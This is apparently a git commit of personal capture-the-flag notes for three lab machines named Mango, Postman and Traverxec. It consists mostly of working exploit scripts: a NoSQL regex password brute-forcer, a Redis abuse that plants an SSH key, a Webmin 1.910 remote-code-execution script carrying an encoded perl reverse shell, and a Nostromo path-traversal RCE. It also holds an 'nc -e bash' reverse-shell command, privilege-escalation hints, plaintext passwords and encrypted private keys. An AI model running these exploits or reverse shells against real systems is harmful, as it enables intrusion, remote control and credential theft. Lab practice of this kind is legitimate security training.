Initial commit

machines/Mango/exploit.jjs

@@ -0,0 +1,7 @@
+var FileReader = Java.type("java.io.FileReader");
+var BufferedReader = Java.type("java.io.BufferedReader");
+var olinkfile = "/root/root.txt";
+var fr = new FileReader(olinkfile);
+var br = new BufferedReader(fr);
+print(br.readLine());
+br.close();

machines/Mango/exploit.py

@@ -0,0 +1,25 @@
+import requests
+import string
+
+username="mango"
+password=""
+url="http://staging-order.mango.htb/index.php"
+
+restart = True
+characters = list(string.ascii_letters + string.digits + "!&@#%_:;}]~")
+characters = characters + ["\\" + c for c in ".^$*+()[{\\|?"]
+
+while restart:
+    restart = False
+
+    for i in characters:
+        payload = password + i
+        print("trying:", payload)
+        post_data = {'username': 'mango', 'password[$regex]': '^' + payload + ".*", 'login': 'login'}
+        r = requests.post(url, data=post_data, allow_redirects=False)
+
+        # A correct password means we get a 302 redirect
+        if r.status_code == 302:
+            print(payload)
+            restart = True
+            password = password + i

machines/Mango/machine

@@ -0,0 +1,36 @@
+IP-Address: 10.10.10.162
+Linux mango 4.15.0-64-generic #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+
+Logins:
+  - mango:h3mXK8RhU~f{]f5H (ssh, http)
+  - admin:t9KcS3>!0B#2 (su, http) (found in mongoDB)
+
+root flag: use jjs
+
+Ports:
+22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
+|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
+|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
+80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: 403 Forbidden
+443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: 400 Bad Request
+| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
+| Not valid before: 2019-09-27T14:21:19
+|_Not valid after:  2020-09-26T14:21:19
+|_ssl-date: TLS randomness does not represent time
+| tls-alpn:
+|_  http/1.1
+
+http urls:
+ - /index.php (Status: 200)
+ - /analytics.php (Status: 200)
+ - /server-status (Status: 403)
+
+http://staging-order.mango.htb:
+  - /index.php (200)
+  - /home.php (302)

machines/Postman/exploit.py

@@ -0,0 +1,68 @@
+import os
+import sys
+import subprocess
+import re
+
+if len(sys.argv) < 3:
+    print("Invalid Usage: %s <host> <pub key> [username] [remote path]" % sys.argv[0])
+    exit(1)
+
+host = sys.argv[1]
+pub_key = sys.argv[2]
+username = 'redis' if len(sys.argv) < 4 else sys.argv[3]
+remote_path = "/var/lib/redis/.ssh/" if len(sys.argv) < 5 else sys.argv[4]
+
+if pub_key.endswith(".pub"):
+    priv_key = pub_key[:-4]
+    if not os.path.isfile(priv_key):
+        print("Private key not found:", priv_key)
+        exit(1)
+else:
+    print("Public key does not end with .pub, i don't know where to find the private key")
+    exit(1)
+
+def resolveRedisPath():
+    bin = "redis-cli"
+    proc = subprocess.Popen(["whereis", bin], stdout=subprocess.PIPE)
+    (out,err) = proc.communicate()
+    proc.wait()
+    if out:
+        out = out.decode("UTF-8").strip()[len(bin)+2:]
+        path = out.split(" ")
+        if path:
+            return path[0]
+
+def getPayload():
+    with open(pub_key, "r") as f:
+        data = f.read().strip()
+        return "\n\n%s\n\n\r\n\n" % data
+
+PATH = resolveRedisPath()
+if PATH and os.path.isfile(PATH):
+    try:
+        print('*******************************************************************')
+        print('* [+] [Exploit] Exploiting misconfigured REDIS SERVER*             ')
+        print('* [+] AVINASH KUMAR THAPA aka "-Acid"                              ')
+        print('*******************************************************************')
+        print()
+        print("[~] Deleting previous keys")
+        os.system("%s -h %s flushall" % (PATH, host))
+        print("[~] Setting public key")
+        prefix = "%s -h %s" % (PATH, host)
+        payload = getPayload()
+        os.system("echo -n -e '%s' | %s -x set cracklist" % (payload, prefix))
+        print("[~] Setting backup file")
+        os.system("%s config set dbfilename \"backup.db\"" % prefix)
+        print("[~] Setting target directory")
+        os.system("%s config set dir %s" % (prefix, remote_path))
+        print("[~] Setting authorized_keys")
+        os.system("%s config set dbfilename \"authorized_keys\"" % prefix)
+        print("[~] Saving")
+        os.system("%s save" % prefix)
+        print("[~] Connecting SSH")
+        os.system("ssh -oPreferredAuthentications=publickey -i %s %s@%s" % (priv_key, username, host))
+
+    except Exception as e:
+        print("Something went wrong:", e)
+else:
+    print("Redis-cli:::::This utility is not present on your system. You need to install it to proceed further.")

machines/Postman/id_rsa.bak

@@ -0,0 +1,30 @@
+-----BEGIN RSA PRIVATE KEY-----
+Proc-Type: 4,ENCRYPTED
+DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
+
+JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
+cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
+7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
+cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
+1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
+EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
+UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
+Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
+t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
+5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
+P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
+jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
+SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
+l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
+0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
+S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
+hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
+Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
+XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
+b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
+WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
+KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
+npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
+VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
+X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
+-----END RSA PRIVATE KEY-----

machines/Postman/machine

@@ -0,0 +1,26 @@
+IP-Address: 10.10.10.160
+
+Ports:
+22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
+|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
+|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
+80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: The Cyber Geek's Personal Website
+6379/tcp  open  redis   Redis key-value store
+10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
+|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
+
+Logins:
+ - Matt:computer2008 (ssh passphrase,user)
+
+# User:
+# 1. redis exploit
+# 2. /opt/id_rsa.bak
+# 3. crack passphrase, use as su Matt
+
+# Root:
+# nc -lvvp 4444
+# webmin_exploit.py

machines/Postman/webmin_exploit.py

@@ -0,0 +1,71 @@
+#!/usr/bin/env python2
+# -*- coding: utf8 -*-
+import requests
+import urllib3
+urllib3.disable_warnings()
+import argparse
+import sys
+from termcolor import colored
+
+
+arg_parser = argparse.ArgumentParser(description='Webmin 1.910 - Remote Code Execution using, python script')
+arg_parser.add_argument('--rhost', dest='rhost', help='Ip address of the webmin server', type=str, required=True)
+arg_parser.add_argument("--rport", dest="rport", type=int, help="target webmin port, default 10000", default=10000)
+arg_parser.add_argument('--lhost', dest='lhost', help='Local ip address to listen for the reverse shell', type=str, required=True)
+arg_parser.add_argument("--lport", dest="lport", type=int, help="The Bind port for the reverse shell\n Default is 4444", default=4444)
+arg_parser.add_argument('-u','--user', dest='user', help='The username to use for authentication\n By default is admin', default='admin', type=str)
+arg_parser.add_argument('-p','--password', dest='password', help='The password to use for authentication', required=True, type=str)
+arg_parser.add_argument('-t','--TARGETURI', dest='targeturi', help='Base path for Webmin application. By default set to "/"', default='/',type=str)
+arg_parser.add_argument('-s','--SSL', dest='ssl', help='Negotiate SSL/TLS for outgoing connections. By default ssl is set to False', default='False',type=str)
+args = arg_parser.parse_args()
+
+# proxy set for test
+proxies = {'http': 'http://127.0.0.1:8080','https': 'http://127.0.0.1:8080'}
+# retrieve the Cookies sid:
+print colored('****************************** Webmin 1.910 Exploit By roughiz*******************************', "blue")
+print colored('*********************************************************************************************', "blue")
+print colored('*********************************************************************************************', "blue")
+print colored('*********************************************************************************************', "blue")
+print colored('****************************** Retrieve Cookies sid *****************************************', "blue")
+
+req={'page':'','user':args.user,'pass':args.password}
+if args.ssl.lower() in ('yes', 'true', 't', 'y', '1'):
+   url="https://"+args.rhost+":"+str(args.rport)+args.targeturi
+else:
+   url="http://"+args.rhost+":"+str(args.rport)+args.targeturi
+
+resu=requests.post(url+"session_login.cgi",data=req, cookies={"testing":"1"}, verify=False, allow_redirects=False)
+if "This web server is running in SSL mode" in resu.content:
+    print colored('********** [+] [Exploit][ERROR] Enable the ssl arg !!', "red")
+    print(resu.content)
+    sys.exit(1)
+if "sid" in resu.headers['Set-Cookie']:
+   sid= resu.headers['Set-Cookie'].replace('\n', '').split('=')[1].split(";")[0].strip()
+   print("\n")
+   print colored('********** [+] [Exploit] The Cookie is '+sid, "green")
+else:
+   print colored('********** [+] [Exploit][ERROR] The authentication to the webmin server failed', "red")
+   sys.exit(1)
+
+print("")
+print colored('********************************************************************************************', "blue")
+print colored('****************************** Create payload and Exploit ***********************************', "blue")
+print("\n")
+
+# Templateofthe payload 
+template="perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\""+args.lhost+":"+str(args.lport)+"\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"
+b64payload = template.encode('base64').replace('\n', '').strip()
+payload=' | bash -c "{echo,'+b64payload+'}|{base64,-d}|{bash,-i}"'
+
+## request the payload
+req={'u':['acl/apt',payload]}
+headers= {'Connection': 'close','referer': url+"package-updates/?xnavigation=1"}
+
+try:
+  resu=requests.post(url+"package-updates/update.cgi",data=req, cookies={"sid":sid}, verify=False, allow_redirects=False, headers=headers, timeout=10)
+except requests.Timeout:
+    pass
+except requests.ConnectionError:
+    pass
+print('\n')
+print colored('********** [+] [Exploit] Verify you nc listener on port '+str(args.lport)+' for the incomming reverse shell', "green")

machines/Traverxec/exploit.py

@@ -0,0 +1,34 @@
+#!/usr/bin/env python
+
+import socket
+import argparse
+
+parser = argparse.ArgumentParser(description='RCE in Nostromo web server through 1.9.6 due to path traversal.')
+parser.add_argument('host',help='domain/IP of the Nostromo web server')
+parser.add_argument('port',help='port number',type=int)
+parser.add_argument('cmd',help='command to execute, default is id',default='id',nargs='?')
+args = parser.parse_args()
+
+def recv(s):
+	r=''
+	try:
+		while True:
+			t=s.recv(1024)
+			if len(t)==0:
+				break
+			r+=t
+	except:
+		pass
+	return r
+
+def exploit(host,port,cmd):
+	s = socket.socket()
+	s.settimeout(1)
+	s.connect((host,int(port)))
+	payload = """POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1""".format(cmd)
+	s.send(payload)
+	r = recv(s)
+	r = r[r.index('\r\n\r\n')+4:]
+	print r
+
+exploit(args.host,args.port,args.cmd)

machines/Traverxec/id_rsa

@@ -0,0 +1,30 @@
+-----BEGIN RSA PRIVATE KEY-----
+Proc-Type: 4,ENCRYPTED
+DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F
+
+seyeH/feG19TlUaMdvHZK/2qfy8pwwdr9sg75x4hPpJJ8YauhWorCN4LPJV+wfCG
+tuiBPfZy+ZPklLkOneIggoruLkVGW4k4651pwekZnjsT8IMM3jndLNSRkjxCTX3W
+KzW9VFPujSQZnHM9Jho6J8O8LTzl+s6GjPpFxjo2Ar2nPwjofdQejPBeO7kXwDFU
+RJUpcsAtpHAbXaJI9LFyX8IhQ8frTOOLuBMmuSEwhz9KVjw2kiLBLyKS+sUT9/V7
+HHVHW47Y/EVFgrEXKu0OP8rFtYULQ+7k7nfb7fHIgKJ/6QYZe69r0AXEOtv44zIc
+Y1OMGryQp5CVztcCHLyS/9GsRB0d0TtlqY2LXk+1nuYPyyZJhyngE7bP9jsp+hec
+dTRqVqTnP7zI8GyKTV+KNgA0m7UWQNS+JgqvSQ9YDjZIwFlA8jxJP9HsuWWXT0ZN
+6pmYZc/rNkCEl2l/oJbaJB3jP/1GWzo/q5JXA6jjyrd9xZDN5bX2E2gzdcCPd5qO
+xwzna6js2kMdCxIRNVErnvSGBIBS0s/OnXpHnJTjMrkqgrPWCeLAf0xEPTgktqi1
+Q2IMJqhW9LkUs48s+z72eAhl8naEfgn+fbQm5MMZ/x6BCuxSNWAFqnuj4RALjdn6
+i27gesRkxxnSMZ5DmQXMrrIBuuLJ6gHgjruaCpdh5HuEHEfUFqnbJobJA3Nev54T
+fzeAtR8rVJHlCuo5jmu6hitqGsjyHFJ/hSFYtbO5CmZR0hMWl1zVQ3CbNhjeIwFA
+bzgSzzJdKYbGD9tyfK3z3RckVhgVDgEMFRB5HqC+yHDyRb+U5ka3LclgT1rO+2so
+uDi6fXyvABX+e4E4lwJZoBtHk/NqMvDTeb9tdNOkVbTdFc2kWtz98VF9yoN82u8I
+Ak/KOnp7lzHnR07dvdD61RzHkm37rvTYrUexaHJ458dHT36rfUxafe81v6l6RM8s
+9CBrEp+LKAA2JrK5P20BrqFuPfWXvFtROLYepG9eHNFeN4uMsuT/55lbfn5S41/U
+rGw0txYInVmeLR0RJO37b3/haSIrycak8LZzFSPUNuwqFcbxR8QJFqqLxhaMztua
+4mOqrAeGFPP8DSgY3TCloRM0Hi/MzHPUIctxHV2RbYO/6TDHfz+Z26ntXPzuAgRU
+/8Gzgw56EyHDaTgNtqYadXruYJ1iNDyArEAu+KvVZhYlYjhSLFfo2yRdOuGBm9AX
+JPNeaxw0DX8UwGbAQyU0k49ePBFeEgQh9NEcYegCoHluaqpafxYx2c5MpY1nRg8+
+XBzbLF9pcMxZiAWrs4bWUqAodXfEU6FZv7dsatTa9lwH04aj/5qxEbJuwuAuW5Lh
+hORAZvbHuIxCzneqqRjS4tNRm0kF9uI5WkfK1eLMO3gXtVffO6vDD3mcTNL1pQuf
+SP0GqvQ1diBixPMx+YkiimRggUwcGnd3lRBBQ2MNwWt59Rri3Z4Ai0pfb1K7TvOM
+j1aQ4bQmVX8uBoqbPvW0/oQjkbCvfR4Xv6Q+cba/FnGNZxhHR8jcH80VaNS469tt
+VeYniFU/TGnRKDYLQH2x0ni1tBf0wKOLERY0CbGDcquzRoWjAmTN/PV2VbEKKD/w
+-----END RSA PRIVATE KEY-----

machines/Traverxec/id_rsa.pub

@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD david@traverxec

machines/Traverxec/machine

@@ -0,0 +1,15 @@
+IP-Address: 10.10.10.165
+
+# 1. www-data shell:
+# python2 exploit.py 10.10.10.165 80 'nc -e bash 10.10.14.2 9999'
+
+# 2. sudo journalctl -n5 -unstromo.service (with small window)
+#    !/bin/sh
+
+Ports:
+  - 22 (ssh)
+  - 80 (nostromo 1.9.6)
+
+Logins:
+ - david:Nowonly4me (?)
+ - hunter (ssh passphrase)